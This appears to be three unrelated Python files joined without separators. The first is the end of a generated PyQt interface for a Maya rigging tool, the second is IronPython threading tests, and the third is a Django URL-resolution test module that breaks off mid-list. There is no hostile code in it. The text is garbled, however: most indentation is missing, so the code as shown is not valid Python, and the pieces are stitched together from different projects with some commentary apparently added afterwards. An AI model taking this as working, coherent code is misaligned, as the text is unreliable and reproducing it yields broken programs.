self.label_3.setObjectName("label_3")
self.verticalLayout_10.addWidget(self.label_3)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setContentsMargins(-1, -1, 0, 0)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.visGroupNameEntry = QtWidgets.QLineEdit(self.verticalLayoutWidget_7)
self.visGroupNameEntry.setObjectName("visGroupNameEntry")
self.horizontalLayout_4.addWidget(self.visGroupNameEntry)
self.label_4 = QtWidgets.QLabel(self.verticalLayoutWidget_7)
self.label_4.setObjectName("label_4")
self.horizontalLayout_4.addWidget(self.label_4)
self.groupLevel = QtWidgets.QSpinBox(self.verticalLayoutWidget_7)
self.groupLevel.setMinimum(1)
self.groupLevel.setObjectName("groupLevel")
self.horizontalLayout_4.addWidget(self.groupLevel)
self.assignVisGroup = QtWidgets.QPushButton(self.verticalLayoutWidget_7)
self.assignVisGroup.setObjectName("assignVisGroup")
self.horizontalLayout_4.addWidget(self.assignVisGroup)
self.verticalLayout_10.addLayout(self.horizontalLayout_4)
spacerItem6 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_10.addItem(spacerItem6)
self.tabWidget.addTab(self.tab_4, "")
self.space_tab = QtWidgets.QWidget()
self.space_tab.setObjectName("space_tab")
self.verticalLayout_17 = QtWidgets.QVBoxLayout(self.space_tab)
self.verticalLayout_17.setObjectName("verticalLayout_17")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.verticalLayout_18 = QtWidgets.QVBoxLayout()
self.verticalLayout_18.setContentsMargins(-1, -1, -1, 0)
self.verticalLayout_18.setObjectName("verticalLayout_18")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.verticalLayout_12 = QtWidgets.QVBoxLayout()
self.verticalLayout_12.setObjectName("verticalLayout_12")
self.spaceList = QtWidgets.QListWidget(self.space_tab)
self.spaceList.setObjectName("spaceList")
self.verticalLayout_12.addWidget(self.spaceList)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.spaceUp = QtWidgets.QPushButton(self.space_tab)
self.spaceUp.setObjectName("spaceUp")
self.horizontalLayout_8.addWidget(self.spaceUp)
self.spaceDown = QtWidgets.QPushButton(self.space_tab)
self.spaceDown.setObjectName("spaceDown")
self.horizontalLayout_8.addWidget(self.spaceDown)
self.verticalLayout_12.addLayout(self.horizontalLayout_8)
self.horizontalLayout_5.addLayout(self.verticalLayout_12)
self.verticalLayout_18.addLayout(self.horizontalLayout_5)
self.spaceQuickButtons = QtWidgets.QGridLayout()
self.spaceQuickButtons.setObjectName("spaceQuickButtons")
self.verticalLayout_18.addLayout(self.spaceQuickButtons)
self.label_17 = QtWidgets.QLabel(self.space_tab)
self.label_17.setObjectName("label_17")
self.verticalLayout_18.addWidget(self.label_17)
self.multiWeights = QtWidgets.QTableWidget(self.space_tab)
self.multiWeights.setEnabled(False)
self.multiWeights.setColumnCount(2)
self.multiWeights.setObjectName("multiWeights")
self.multiWeights.setRowCount(0)
self.multiWeights.horizontalHeader().setVisible(False)
self.verticalLayout_18.addWidget(self.multiWeights)
self.horizontalLayout_12.addLayout(self.verticalLayout_18)
spacerItem7 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem7)
self.verticalLayout_17.addLayout(self.horizontalLayout_12)
self.tabWidget.addTab(self.space_tab, "")
self.horizontalLayout.addWidget(self.tabWidget)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 991, 21))
self.menubar.setObjectName("menubar")
self.menuTools = QtWidgets.QMenu(self.menubar)
self.menuTools.setObjectName("menuTools")
self.menuVisibility = QtWidgets.QMenu(self.menuTools)
self.menuVisibility.setObjectName("menuVisibility")
self.menuSettings = QtWidgets.QMenu(self.menubar)
self.menuSettings.setObjectName("menuSettings")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionCard_Orients = QtWidgets.QAction(MainWindow)
self.actionCard_Orients.setCheckable(True)
self.actionCard_Orients.setObjectName("actionCard_Orients")
self.actionReconnect_Real_Joints = QtWidgets.QAction(MainWindow)
self.actionReconnect_Real_Joints.setObjectName("actionReconnect_Real_Joints")
self.actionCard_Orients_2 = QtWidgets.QAction(MainWindow)
self.actionCard_Orients_2.setCheckable(True)
self.actionCard_Orients_2.setObjectName("actionCard_Orients_2")
self.actionConnectors = QtWidgets.QAction(MainWindow)
self.actionConnectors.setCheckable(True)
self.actionConnectors.setObjectName("actionConnectors")
self.actionHandles = QtWidgets.QAction(MainWindow)
self.actionHandles.setCheckable(True)
self.actionHandles.setObjectName("actionHandles")
self.actionMatch_Selected_Orients = QtWidgets.QAction(MainWindow)
self.actionMatch_Selected_Orients.setObjectName("actionMatch_Selected_Orients")
self.actionNaming_Rules = QtWidgets.QAction(MainWindow)
self.actionNaming_Rules.setObjectName("actionNaming_Rules")
self.actionShow_Individual_Restores = QtWidgets.QAction(MainWindow)
self.actionShow_Individual_Restores.setCheckable(True)
self.actionShow_Individual_Restores.setObjectName("actionShow_Individual_Restores")
self.actionShow_Card_Rig_State = QtWidgets.QAction(MainWindow)
self.actionShow_Card_Rig_State.setCheckable(True)
self.actionShow_Card_Rig_State.setObjectName("actionShow_Card_Rig_State")
self.menuVisibility.addAction(self.actionCard_Orients_2)
self.menuVisibility.addAction(self.actionConnectors)
self.menuVisibility.addAction(self.actionHandles)
self.menuTools.addAction(self.actionReconnect_Real_Joints)
self.menuTools.addAction(self.menuVisibility.menuAction())
self.menuTools.addAction(self.actionMatch_Selected_Orients)
self.menuSettings.addAction(self.actionNaming_Rules)
self.menuSettings.addAction(self.actionShow_Individual_Restores)
self.menuSettings.addAction(self.actionShow_Card_Rig_State)
self.menubar.addAction(self.menuTools.menuAction())
self.menubar.addAction(self.menuSettings.menuAction())
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
self.rigStateTab.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
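# connectSlotsByName auto-connects any slots named on_<objectName>_<signalName> defined on MainWindow to the matching widget signals.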
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtCompat.translate("MainWindow", "MainWindow", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), QtCompat.translate("MainWindow", "Start", None, -1))
self.buildBonesBtn.setText(QtCompat.translate("MainWindow", "Build Bones", None, -1))
self.buildRigBtn.setText(QtCompat.translate("MainWindow", "Build Rig", None, -1))
self.selectAllBtn.setText(QtCompat.translate("MainWindow", "Select All", None, -1))
self.deleteRigBtn.setText(QtCompat.translate("MainWindow", "Delete Rig", None, -1))
self.deleteBonesBtn.setText(QtCompat.translate("MainWindow", "Delete Bones", None, -1))
self.saveModsBtn.setText(QtCompat.translate("MainWindow", "Save Mods", None, -1))
self.restoreModsBtn.setText(QtCompat.translate("MainWindow", "Restore Mods", None, -1))
self.makeCardBtn.setText(QtCompat.translate("MainWindow", "Make Card", None, -1))
self.rebuildProxyBtn.setText(QtCompat.translate("MainWindow", "Rebuild Proxy", None, -1))
self.constraintsRestore.setText(QtCompat.translate("MainWindow", "Const", None, -1))
self.lockedAttrsRestore.setText(QtCompat.translate("MainWindow", "Locked", None, -1))
self.spacesRestore.setText(QtCompat.translate("MainWindow", "Space", None, -1))
self.pushButton_3.setText(QtCompat.translate("MainWindow", "Shape", None, -1))
self.visGroupRestore.setText(QtCompat.translate("MainWindow", "Vis", None, -1))
self.connectionsRestore.setText(QtCompat.translate("MainWindow", "Conn", None, -1))
self.setDrivenRestore.setText(QtCompat.translate("MainWindow", "Driven", None, -1))
self.customAttrsRestore.setText(QtCompat.translate("MainWindow", "Attrs", None, -1))
self.cardLister.headerItem().setText(0, QtCompat.translate("MainWindow", "Name", None, -1))
self.cardLister.headerItem().setText(1, QtCompat.translate("MainWindow", "Vis", None, -1))
self.cardLister.headerItem().setText(2, QtCompat.translate("MainWindow", "Type", None, -1))
self.cardLister.headerItem().setText(3, QtCompat.translate("MainWindow", "Start", None, -1))
self.cardLister.headerItem().setText(4, QtCompat.translate("MainWindow", "Repeat", None, -1))
self.cardLister.headerItem().setText(5, QtCompat.translate("MainWindow", "End", None, -1))
self.cardLister.headerItem().setText(6, QtCompat.translate("MainWindow", "Mirror", None, -1))
self.cardLister.headerItem().setText(7, QtCompat.translate("MainWindow", "Side", None, -1))
self.mergeCardBtn.setText(QtCompat.translate("MainWindow", "Merge", None, -1))
self.label.setText(QtCompat.translate("MainWindow", "Cards", None, -1))
self.splitCardBtn.setText(QtCompat.translate("MainWindow", "Split", None, -1))
self.addCardIkButton.setText(QtCompat.translate("MainWindow", "Add Card Ik", None, -1))
self.label_2.setText(QtCompat.translate("MainWindow", "Joints", None, -1))
self.duplicateCardBtn.setText(QtCompat.translate("MainWindow", "Duplicate", None, -1))
self.remCardIkButton.setText(QtCompat.translate("MainWindow", "Rem Card Ik", None, -1))
self.insertJointBtn.setText(QtCompat.translate("MainWindow", "Insert Child", None, -1))
self.addTipBtn.setText(QtCompat.translate("MainWindow", "Add Tip", None, -1))
self.deleteJointBtn.setText(QtCompat.translate("MainWindow", "Delete", None, -1))
self.customUpBtn.setText(QtCompat.translate("MainWindow", "Custom Up", None, -1))
self.jointLister.horizontalHeaderItem(0).setText(QtCompat.translate("MainWindow", "Name", None, -1))
self.jointLister.horizontalHeaderItem(1).setText(QtCompat.translate("MainWindow", "Helper", None, -1))
self.jointLister.horizontalHeaderItem(2).setText(QtCompat.translate("MainWindow", "Output", None, -1))
self.jointLister.horizontalHeaderItem(3).setText(QtCompat.translate("MainWindow", "Handles", None, -1))
self.jointLister.horizontalHeaderItem(4).setText(QtCompat.translate("MainWindow", "Orient To", None, -1))
self.jointLister.horizontalHeaderItem(5).setText(QtCompat.translate("MainWindow", "Child Of", None, -1))
self.cardParams.horizontalHeaderItem(0).setText(QtCompat.translate("MainWindow", "1", None, -1))
self.cardParams.horizontalHeaderItem(1).setText(QtCompat.translate("MainWindow", "2", None, -1))
self.updateRigState.setText(QtCompat.translate("MainWindow", "Update", None, -1))
self.space_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.space_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_2), QtCompat.translate("MainWindow", "Space", None, -1))
self.vis_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.vis_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_8), QtCompat.translate("MainWindow", "Vis", None, -1))
self.shape_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.shape_local_load.setText(QtCompat.translate("MainWindow", "Load Local", None, -1))
self.shape_world_load.setText(QtCompat.translate("MainWindow", "Load World", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_6), QtCompat.translate("MainWindow", "Shape", None, -1))
self.constraints_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.constraints_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_7), QtCompat.translate("MainWindow", "Const", None, -1))
self.connections_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.connections_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_5), QtCompat.translate("MainWindow", "Conn", None, -1))
self.driven_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.driven_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_9), QtCompat.translate("MainWindow", "Driven", None, -1))
self.custom_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.custom_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_10), QtCompat.translate("MainWindow", "Custom", None, -1))
self.locked_save.setText(QtCompat.translate("MainWindow", "Save", None, -1))
self.locked_load.setText(QtCompat.translate("MainWindow", "Load", None, -1))
self.rigStateTab.setTabText(self.rigStateTab.indexOf(self.tab_11), QtCompat.translate("MainWindow", "Locked", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), QtCompat.translate("MainWindow", "Cards", None, -1))
self.label_5.setText(QtCompat.translate("MainWindow", "Shapes", None, -1))
self.label_11.setText(QtCompat.translate("MainWindow", "Surface Color", None, -1))
self.label_12.setText(QtCompat.translate("MainWindow", "Curve Color", None, -1))
self.label_13.setText(QtCompat.translate("MainWindow", "Shapes", None, -1))
self.label_14.setText(QtCompat.translate("MainWindow", "Shape Clipboard", None, -1))
self.copyShapes.setText(QtCompat.translate("MainWindow", "Copy to Second Selection", None, -1))
self.label_7.setText(QtCompat.translate("MainWindow", "Select CVs", None, -1))
self.select_cvs.setText(QtCompat.translate("MainWindow", "All", None, -1))
self.copyToCBBtn.setText(QtCompat.translate("MainWindow", "Copy", None, -1))
self.pasteLocalBtn.setText(QtCompat.translate("MainWindow", "Paste Local", None, -1))
self.pasteWorldBtn.setText(QtCompat.translate("MainWindow", "Paste World", None, -1))
self.select_band_edge_1.setText(QtCompat.translate("MainWindow", "Band Edge 1", None, -1))
self.mirrorShapes.setText(QtCompat.translate("MainWindow", "Mirror to Selected", None, -1))
self.mirrorSide.setText(QtCompat.translate("MainWindow", "Mirror All to Other Side", None, -1))
self.select_pin_head.setText(QtCompat.translate("MainWindow", "Pin Head", None, -1))
self.select_band_edge_2.setText(QtCompat.translate("MainWindow", "Band Edge 2", None, -1))
self.copyColor.setText(QtCompat.translate("MainWindow", "Copy Color", None, -1))
self.label_9.setText(QtCompat.translate("MainWindow", "Scale", None, -1))
self.minus_ten.setText(QtCompat.translate("MainWindow", "-10%", None, -1))
self.minus_one.setText(QtCompat.translate("MainWindow", "-1%", None, -1))
self.plus_one.setText(QtCompat.translate("MainWindow", "+1%", None, -1))
self.plus_ten.setText(QtCompat.translate("MainWindow", "+10%", None, -1))
self.label_10.setText(QtCompat.translate("MainWindow", "Rotate", None, -1))
self.rot_local_y.setText(QtCompat.translate("MainWindow", "Rotate Y 45", None, -1))
self.label_6.setText(QtCompat.translate("MainWindow", "Local", None, -1))
self.label_8.setText(QtCompat.translate("MainWindow", "World", None, -1))
self.rot_world_x.setText(QtCompat.translate("MainWindow", "Rotate X 45", None, -1))
self.rot_local_x.setText(QtCompat.translate("MainWindow", "Rotate X 45", None, -1))
self.rot_world_y.setText(QtCompat.translate("MainWindow", "Rotate Y 45", None, -1))
self.rot_local_z.setText(QtCompat.translate("MainWindow", "Rotate Z 45", None, -1))
self.rot_world_z.setText(QtCompat.translate("MainWindow", "Rotate Z 45", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.controller_edit), QtCompat.translate("MainWindow", "Controller Edit", None, -1))
self.unequipVisControl.setText(QtCompat.translate("MainWindow", "Unequip Vis Control", None, -1))
self.equipVisControl.setText(QtCompat.translate("MainWindow", "Equip Vis Control", None, -1))
self.pruneVisGroups.setText(QtCompat.translate("MainWindow", "Prune Unused Vis Groups", None, -1))
self.tagAsMain.setText(QtCompat.translate("MainWindow", "Tag as Main Control", None, -1))
self.label_3.setText(QtCompat.translate("MainWindow", "Assign to Group", None, -1))
self.label_4.setText(QtCompat.translate("MainWindow", "Level", None, -1))
self.assignVisGroup.setText(QtCompat.translate("MainWindow", "Assign", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_4), QtCompat.translate("MainWindow", "Vis Groups", None, -1))
self.spaceUp.setText(QtCompat.translate("MainWindow", " ^ ", None, -1))
self.spaceDown.setText(QtCompat.translate("MainWindow", " v ", None, -1))
self.label_17.setText(QtCompat.translate("MainWindow", "Multi Weights editor (doesn\'t work just yet)", None, -1))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.space_tab), QtCompat.translate("MainWindow", "Space", None, -1))
self.menuTools.setTitle(QtCompat.translate("MainWindow", "Tools", None, -1))
self.menuVisibility.setTitle(QtCompat.translate("MainWindow", "Visibility", None, -1))
self.menuSettings.setTitle(QtCompat.translate("MainWindow", "Settings", None, -1))
self.actionCard_Orients.setText(QtCompat.translate("MainWindow", "Card Orients", None, -1))
self.actionReconnect_Real_Joints.setText(QtCompat.translate("MainWindow", "Reconnect Real Joints", None, -1))
self.actionCard_Orients_2.setText(QtCompat.translate("MainWindow", "Card Orients", None, -1))
self.actionConnectors.setText(QtCompat.translate("MainWindow", "Connectors", None, -1))
self.actionHandles.setText(QtCompat.translate("MainWindow", "Joint Handles", None, -1))
self.actionMatch_Selected_Orients.setText(QtCompat.translate("MainWindow", "Match Selected Orients", None, -1))
self.actionNaming_Rules.setText(QtCompat.translate("MainWindow", "Naming Rules", None, -1))
self.actionShow_Individual_Restores.setText(QtCompat.translate("MainWindow", "Show Individual Restores", None, -1))
self.actionShow_Card_Rig_State.setText(QtCompat.translate("MainWindow", "Show Card Rig State", None, -1))
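# The trailing imports below bring in the promoted custom widget classes (CardLister, CardParams, JointLister) used by this UI; uic-style generators append such imports at the end of the generated module.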
from pdil.tool.fossil.cardlister import CardLister
from pdil.tool.fossil.cardparams import CardParams
from pdil.tool.fossil.jointlister import JointLister
#####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
from iptest.assert_util import *
import thread
import time
import sys
if not is_cpython:
from System import *
from System.Threading import *
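# System and System.Threading are .NET namespaces, so these star-imports only succeed under IronPython; the is_cpython guard above keeps CPython from attempting them.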
@skip("win32")
def test_thread():
class Sync:
hit = 0
def ThreadProcParm(parm):
parm.hit = 1
def ThreadProcNoParm():
pass
def Main():
if not is_silverlight:
sync = Sync()
t = Thread(ParameterizedThreadStart(ThreadProcParm))
t.Start(sync)
t.Join()
Assert(sync.hit == 1)
t = Thread(ThreadStart(ThreadProcNoParm))
t.Start()
t.Join()
Main()
def import_sys():
import sys
Assert(sys != None)
t = Thread(ThreadStart(import_sys))
t.Start()
t.Join()
so = sys.stdout
se = sys.stderr
class myStdOut:
def write(self, text): pass
sys.stdout = myStdOut()
sys.stderr = myStdOut()
import thread
def raises(*p):
raise Exception
id = thread.start_new_thread(raises, ())
Thread.Sleep(1000) # give the background thread time to raise and print its traceback while stderr is still swallowed.
sys.stdout = so
sys.stderr = se
def test_stack_size():
import sys
if is_cli or (sys.version_info[0] == 2 and sys.version_info[1] > 4) or sys.version_info[0] > 2:
import thread
size = thread.stack_size()
Assert(size==0 or size>=32768)
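# thread.stack_size(n) accepts 0 (use the platform default) or a value of at least 32768 bytes; anything else raises ValueError, which is what the loop below verifies.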
bad_size_list = [ 1, -1, -32768, -32769, -32767, -40000, 32767, 32766]
for bad_size in bad_size_list:
AssertError(ValueError, thread.stack_size, bad_size)
good_size_list = [4096*10, 4096*100, 4096*1000, 4096*10000]
for good_size in good_size_list:
#CodePlex Work Item 7827
if (is_cli or is_silverlight) and good_size<=50000: print "Ignoring", good_size, "for CLI"; continue
temp = thread.stack_size(good_size)
Assert(temp>=32768 or temp==0)
def temp(): pass
thread.start_new_thread(temp, ())
temp = thread.stack_size(1024*1024)
Assert(temp>=32768 or temp==0)
@skip("win32")
def test_new_thread_is_background():
"""verify new threads created during Python are background threads"""
import thread
global done
done = None
def f():
global done
done = Thread.CurrentThread.IsBackground
thread.start_new_thread(f, ())
while done == None:
Thread.Sleep(1000)
Assert(done)
@skip("silverlight")
def test_threading_waits_for_thread_exit():
import os
from iptest.process_util import launch
f = file('temp.py', 'w+')
try:
f.write("""
import sys
def f():
print 'bye bye'
def f(*args):
print 'bye bye'
sys.exitfunc = f
from threading import Thread
def count(n):
while n > 0:
n -= 1
print 'done'
t1 = Thread(target=count, args=(50000000,))
t1.start()
""")
f.close()
stdin, stdout = os.popen2(sys.executable + ' temp.py')
Assert('bye bye\n' in list(stdout))
finally:
import nt
nt.unlink('temp.py')
@skip("win32")
def test_thread_local():
import thread
x = thread._local()
#--Sanity
x.foo = 42
AreEqual(x.foo, 42)
global found
found = None
def f():
global found
found = hasattr(x, 'foo')
thread.start_new_thread(f, ())
while found == None:
Thread.Sleep(1000)
Assert(not found)
AreEqual(x.__dict__, {'foo': 42})
try:
x.__dict__ = None
Fail("Should not be able to set thread._local().__dict__!")
except AttributeError, e:
pass
try:
print x.bar
Fail("There is no 'bar' member on thread._local()")
except AttributeError, e:
pass
del x.foo
AreEqual(x.__dict__, {})
def test_start_new():
#--Sanity
global CALLED
CALLED = False
def tempFunc():
global CALLED
CALLED = 3.14
thread.start_new(tempFunc, ())
while CALLED==False:
print ".",
time.sleep(1)
AreEqual(CALLED, 3.14)
CALLED = False
def test_start_new_thread():
#--Sanity
global CALLED
CALLED = False
lock = thread.allocate()
def tempFunc(mykw_param=1):
global CALLED
lock.acquire()
CALLED = mykw_param
lock.release()
thread.exit_thread()
id = thread.start_new_thread(tempFunc, (), {"mykw_param":7})
while CALLED==False:
print ".",
time.sleep(1)
AreEqual(CALLED, 7)
id = thread.start_new_thread(tempFunc, (), {"mykw_param":8})
while CALLED!=8: #Hang forever if this is broken
print ".",
time.sleep(1)
#--Sanity Negative
global temp_stderr
temp_stderr = ""
se = sys.stderr
class myStdOut:
def write(self, text):
global temp_stderr
temp_stderr += text
try:
sys.stderr = myStdOut()
id = thread.start_new_thread(tempFunc, (), {"my_misspelled_kw_param":9})
time.sleep(5)
if not is_silverlight:
se.flush()
finally:
sys.stderr = se
AreEqual(CALLED, 8)
Assert("tempFunc() got an unexpected keyword argument 'my_misspelled_kw_param" in temp_stderr)
@skip("win32")
def test_thread_interrupt_main():
AssertError(NotImplementedError, thread.interrupt_main)
#------------------------------------------------------------------------------
run_test(__name__)
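# run_test(__name__) is the iptest harness entry point; it locates and runs the test_* functions defined in this module.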
"""
Unit tests for reverse URL lookups.
"""
from __future__ import absolute_import
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.core.urlresolvers import (reverse, resolve, NoReverseMatch,
Resolver404, ResolverMatch, RegexURLResolver, RegexURLPattern)
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.shortcuts import redirect
from django.test import TestCase
from django.utils import unittest
from django.contrib.auth.models import User
from . import urlconf_outer, urlconf_inner, middleware, views
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/view_class/42/37/', 'view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/normal/42/37/', 'inc-normal-view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/view_class/42/37/', 'inc-view-class', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
('/included/mixed_args/42/37/', 'inc-mixed-args', None, '', views.empty_view, tuple(), {'arg2': '37'}),
# Unnamed views will be resolved to the function/class name
('/unnamed/normal/42/37/', 'regressiontests.urlpatterns_reverse.views.empty_view', None, '', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/unnamed/view_class/42/37/', 'regressiontests.urlpatterns_reverse.views.ViewClass', None, '', views.view_class_instance, tuple(), {'arg1': '42', 'arg2': '37'}),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', None, '', views.empty_view, ('42','37'), {}),
('/included/no_kwargs/42/37/', 'inc-no-kwargs', None, '', views.empty_view, ('42','37'), {}),
# Namespaces
('/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/ns-included1/normal/42/37/', 'inc-normal-view', None, 'inc-ns1', views.empty_view, tuple(), {'arg1': '42', 'arg2': '37'}),
('/included/test3/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
# Nested namespaces
('/ns-included1/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
('/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view', 'testapp', 'inc-ns1:inc-ns4:inc-ns2:test-ns3', 'empty_view', tuple(), {'arg1': '42', 'arg2': '37'}),
# Namespaces capturing variables
('/inc70/', 'inner-nothing', None, 'inc-ns5', views.empty_view, tuple(), {'outer': '70'}),
('/inc78/extra/foobar/', 'inner-extra', None, 'inc-ns5', views.empty_view, tuple(), {'outer':'78', 'extra':'foobar'}),
)
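# Illustrative sketch only: this helper is not part of the original test module and is never
# called here. It shows how one resolve_test_data entry lines up with the ResolverMatch that
# resolve() returns; url_name handling for unnamed views is more subtle, so only the
# unambiguous attributes (namespace, args, kwargs) are asserted in this example.
def _example_resolve_entry(path, url_name, app_name, namespace, view_func, args, kwargs):
    match = resolve(path)
    assert match.namespace == namespace
    assert match.args == args
    assert match.kwargs == kwargs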
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], dict(year=2007, month=5, day=21)),
('windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [], dict(drive_name='C', path=r'Documents and Settings\spam')),
('special', r'/special_chars/+%5C$*/', [r'+\$*'], {}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('insensitive', '/CaseInsensitive/fred', ['fred'], {}),
('test', '/test/1', [], {}),
('test2', '/test/2', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
